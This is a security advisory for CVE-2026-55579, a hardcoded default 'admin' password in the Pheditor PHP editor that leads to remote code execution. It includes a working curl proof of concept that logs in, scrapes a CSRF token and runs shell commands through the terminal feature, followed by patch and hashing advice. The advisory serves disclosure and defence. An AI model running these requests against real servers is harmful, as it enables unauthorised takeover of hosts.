critical · 9.8CVE-2026-55579Jul 16, 2026

CVE-2026-55579: Pheditor Hardcoded Default Password Enables Unauthenticated RCE

Rohit Hatagale
AI Security Researcher, SecureLayer7

Pheditor ships with a hardcoded default password 'admin' and no forced change on first login, letting any remote attacker authenticate and immediately reach file upload and terminal features for full

Packagepheditor/pheditor
Ecosystemcomposer
Affected>= 2.0.1, < 2.0.6
Fixed in2.0.6

The problem

Pheditor stores the SHA-512 hash of the string 'admin' as a compile-time constant at pheditor.php line 11. There is no setup wizard, no first-login enforcement, and no password expiry.

Any attacker who knows the default (publicly documented in the README and source) can authenticate with zero brute force. Once in, the terminal action and file upload features allow arbitrary command execution and webshell upload, giving full control of the server.

Proof of concept

A working proof-of-concept for CVE-2026-55579 in pheditor/pheditor, with the exact payload below.

bash
# Step 1: authenticate with the default password
curl -s -c /tmp/cookies.txt -X POST http://TARGET/pheditor.php \
  -d 'pheditor_password=admin' -L -o /dev/null -w "%{http_code}"
# Expected: 200

# Step 2: grab a CSRF token from the authenticated session
TOKEN=$(curl -s -b /tmp/cookies.txt http://TARGET/pheditor.php | \
  grep -o 'token = "[a-f0-9]*"' | grep -o '"[a-f0-9]*"' | tr -d '"')

# Step 3: execute arbitrary commands via the terminal action
curl -s -b /tmp/cookies.txt -X POST http://TARGET/pheditor.php \
  --data-urlencode 'action=terminal' \
  --data-urlencode "token=$TOKEN" \
  --data-urlencode 'command=echo `id`' \
  --data-urlencode 'dir='
# Expected: uid=33(www-data) ... proves full OS access

The login check at pheditor.php computes `hash('sha512', $_POST['pheditor_password'])` and compares it to the PASSWORD constant. The constant ships as the SHA-512 of 'admin' (`c7ad44cbad762a5da0a452f9e854fdc1e0e7a52a38015f23f3eab1d80b931dd472634dfac71cd34ebc35d16ab7fb8a90c81f975113d6c7538dc69dd8de9077ec`), a value publicly known from the source.

Because there is no forced change on first login, this credential is permanently valid on any default deployment. The visual warning banner at lines 1956-1958 is the only mitigation, and it is trivially ignored.

The patch in 2.0.6 introduces a setup/forced-change flow that blocks normal application access until the default password has been replaced, so the hardcoded hash is no longer sufficient to reach the editor. The root cause is CWE-798 (Use of Hard-coded Credentials).

The fix

Upgrade to pheditor/pheditor 2.0.6 or later. Version 2.0.6 adds a forced first-login password change that prevents access to the editor until the default 'admin' password has been replaced. Additionally, consider adopting password_hash()/password_verify() with PASSWORD_BCRYPT instead of raw unsalted SHA-512 for future-proof credential storage.

Reported by Thai Son Dinh, VinSOC Labs (R&D).

References: [1][2][3]

Related research